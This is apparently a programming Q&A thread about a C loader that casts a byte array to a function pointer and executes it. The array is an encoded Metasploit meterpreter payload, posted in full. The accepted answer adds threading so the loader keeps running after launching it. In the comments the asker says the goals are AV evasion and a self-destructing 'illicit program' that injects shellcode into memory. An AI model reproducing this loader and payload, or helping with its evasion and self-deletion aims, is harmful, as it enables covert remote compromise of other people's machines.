# C program hangs / suspends while executing shellcode

Tags: c, shellcode

```
#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
    void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this");
    return 0;
}
```

While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().

Please help :)

**Reply to Eric Finn and Alvin Wong**

I changed as what both of you instructed and the error I got is:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

X:>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this

char shellcode[] is valid. I have compiled it successfully before.

below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:

```
#include <stdio.h>
#include <stdlib.h>

char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";

int main (int argc, char **argv) {

void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this"); // instead of more lines i put this one
    return 0;
}
```

*the above code compiles successfully and runs perfectly*

*i changed some lines to system(shellcode). it compiles but doesnt run properly*

Comment: What makes you think that converting a pointer to characters to a function pointer should somehow execute shell code??? C is not nearly as dynamic as one might think.

Comment: @dasblinkenlight It definitely is one of the more interesting things I've seen attempted in C. I would be interested in finding out where this idea came from, too.

Comment: Perhaps `shellcode[]` is machine code represented in ASCII char, you can't deny that :P

Comment: @AlvinWong Then it has a rather poor variable name.

Comment: @AlvinWong Oh, wow... You were right.

Comment: With your `»".¼` I only come up with `ret 0x22bb` when disassembled?

Comment: Hi really want to see what happens to it, its one of the most bizarre things tried with "C" in my opinion. Are you trying to write virus or something like that?

Comment: 'below is the original code with malicious shellcode so your antivirus should detect it' - hmmm, think I'll give that one a miss ;)

Comment: Ok, so, how *exactly* have you generated "shellcode" - because when I put the hex in here -  http://www.onlinedisassembler.com/odaweb/run_hex - having removed the \x and quotes, it doesn't look like sensible x86 code.

Comment: @Eric, actually, I suspect it's a 'good' variable name, but with scope for confusion...  http://en.wikipedia.org/wiki/Shellcode

Comment: @Roddy Oh, interesting, I haven't heard of that before. Thanks.

Comment: @Roddy it's a meterpreter shellcode from metasploit framework

Comment: @mnaim86 - I have written a detailed explanation of how to get this to work, but I was under the assumption that you were working on this for education or research.  After reading those comments, I've deleted my answer.  I'd like to have some assurance that what you're doing is ethical!

Comment: @Kevin this is ethical. the shellcode connects to an invalid host, you can check it. im doing this for educational purpose. when sptr() gets executed, the lines below are ignored forever. im thinking of how to insert a line above sptr() to wait a minute, then execute sptr() and then execute lines below it no matter what. if you got the brilliant idea, please share with us

Answer (score 1, accepted):

As my understanding, you want to run some "machine code" (*not* shellcode), and no matter how the code runs it should continue the program.

This is possible, by using threading.

First add these includes:

```
#include <windows.h>
#include <process.h>
```

And in your code:

```
void (*sptr)(void*);                  // Type for `_beginthread`
sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
_beginthread(sptr,0,NULL);            // This starts your code in a new thread
Sleep(5000);                          // Wait for 5000 ms
printf("must display this");
```

Of course this is *not* a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.

P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), **and my antivirus didn't detect anything** (do I need to switch to another one??), so you may need to review the code or add an exception handler...

Comment: Thanks a lot. This program is for research purpose. The shellcode is a meterpreter payload for system penetration testing. Your antivirus didnt detect anything probably because it's been encoded. However the encoding is weak and I have another way to make it fully undetectable by AV vendors. I asked that I wanted the code to execute lines after sptr() because I want the code to destroy itself. Now that it works, I have an illicit program that injects a shellcode into memory and self-destruct itself.

Answer (score 4):

Okay, since `shellcode` is actually machine code rather than shell code (according to your latest edit), the answer is different.

When you declare `char shellcode[]`, `shellcode` is a pointer to a memory location. This means that instead of

```
sptr = (void(*)()) (&shellcode);
```

you should have

```
sptr = (void(*)()) (shellcode);
```

Additionally, you want the code to be in the executable part of your binary, rather than in the data part of the binary. That means you want `char *shellcode = ...` rather than `char shellcode[] = ...`.

Also, you should be sure that `shellcode` is a valid compiled C function with the same calling convention as the code that calls it.

Comment: This is the error I got: Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

X:\>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this

Comment: Same thing. It compiles, runs OK. But still doesnt printf()

Comment: @user554138 Alright, one more edit. See if changing the declaration like I said works.

Comment: @user554138 I guess the thing to do would be to compile both what you have there and a version where you put the C source of the function you want to execute, assign a function pointer to that function, and call it, then compare the resulting binaries and follow the execution path to make sure they're doing the same thing.

Comment: unfortunately I cant compile both codes altogether. shellcode is an output of a program